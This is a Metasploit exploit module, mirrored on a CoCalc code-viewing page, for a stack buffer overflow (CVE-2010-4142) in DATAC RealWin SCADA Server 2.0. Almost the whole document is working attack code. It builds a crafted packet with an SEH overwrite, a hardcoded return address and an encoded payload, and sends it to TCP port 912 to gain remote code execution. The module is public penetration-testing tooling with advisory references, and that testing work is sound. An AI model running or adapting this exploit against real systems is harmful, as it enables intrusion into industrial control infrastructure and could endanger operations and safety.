Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/realwin_scpc_initialize.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in DATAC Control

19
          International RealWin SCADA Server 2.0 (Build 6.1.8.10).

20
          By sending a specially crafted packet, an attacker may be able to execute arbitrary code.

21
        },

22
        'Author' => [ 'Luigi Auriemma', 'MC' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'OSVDB', '68812' ],

26
          [ 'CVE', '2010-4142' ],

27
          [ 'URL', 'http://aluigi.altervista.org/adv/realwin_1-adv.txt' ],

28
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01']

29
        ],

30
        'Privileged' => true,

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'thread',

33
        },

34
        'Payload' => {

35
          'Space' => 550,

36
          'BadChars' => "\x00\x20\x0a\x0d",

37
          'StackAdjustment' => -3500,

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          [ 'Universal', { 'Ret' => 0x4002da21 } ], # FlexMLang.DLL 8.1.45.19

42
        ],

43
        'DefaultTarget' => 0,

44
        'DisclosureDate' => '2010-10-15',

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options([Opt::RPORT(912)])

54
  end

55


56
  def exploit

57
    connect

58


59
    data = [0x6a541264].pack('V')

60
    data << [0x00000002].pack('V')

61
    data << [0x00001ff4].pack('V')

62
    data << rand_text_alpha_upper(228)

63
    data << generate_seh_payload(target.ret)

64
    data << rand_text_alpha_upper(10024 - payload.encoded.length)

65
    data << "\x00"

66


67
    print_status("Trying target #{target.name}...")

68
    sock.put(data)

69


70
    handler

71
    disconnect

72
  end

73
end

74


75